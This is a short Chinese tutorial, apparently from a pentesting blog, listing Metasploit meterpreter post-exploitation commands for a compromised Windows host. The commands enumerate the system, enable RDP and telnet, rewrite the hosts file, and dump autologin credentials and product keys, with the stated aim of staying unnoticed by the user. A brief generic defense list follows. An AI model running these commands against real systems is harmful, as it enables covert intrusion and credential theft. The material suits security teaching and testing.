后漏洞利用
后漏洞利用也就是一旦获取了系统的访问控制权,我们的关注点就在于从系统中获取尽可能多的信息,同时不能被用户发现。
比如:windows注册表转存文件,密码散列转存文件、屏幕截图、以及音频记录等。收集敏感信息,对信息进行归档。
首先我们使用meterpreter会话,保持与目标系统的连接性
1、收集操作系统信息
sysinfo
2、查看当前进程
ps
3、目标系统是否使用虚拟机
run checkvm
4、目标系统是否正在运行
idletime
5、获取目标系统环境变量
run get_env
6、目标系统的网络信息
ipconfig
7、目标系统的网络拓扑
route
8、当前目标系统的防火墙设置
run getcountermeasure
9、目标系统启用RDP远程桌面服务协议
run getgui -e
10、开启目标系统上的telnet服务协议
run gettelnet -e
11、开启目标系统上的ssh服务协议
12、修改用户的host文件
run hostsedit -e 192.168.29.133,www.51cto.com
13、当前登陆目标系统的用户
run enum_logged_on_user
14、查看已经安装的应用软件
run get_application_list
15、目标系统的驱动器信息(硬盘信息)
run windows/gather/forensics/enum_drives
16、查看目标主机的产品密钥
run windows/gather/enum_ms_product_keys
17、目标系统上的autologin特征
run windows/gather/credentials/windows_autologin
18、转存目标系统的各种信息
run winenum
19、转存目标系统的额外信息
run scraper
防御措施
1、系统补丁应该及时打上
2、来源不明的链接,文档不能轻易打开
3、提升安全意识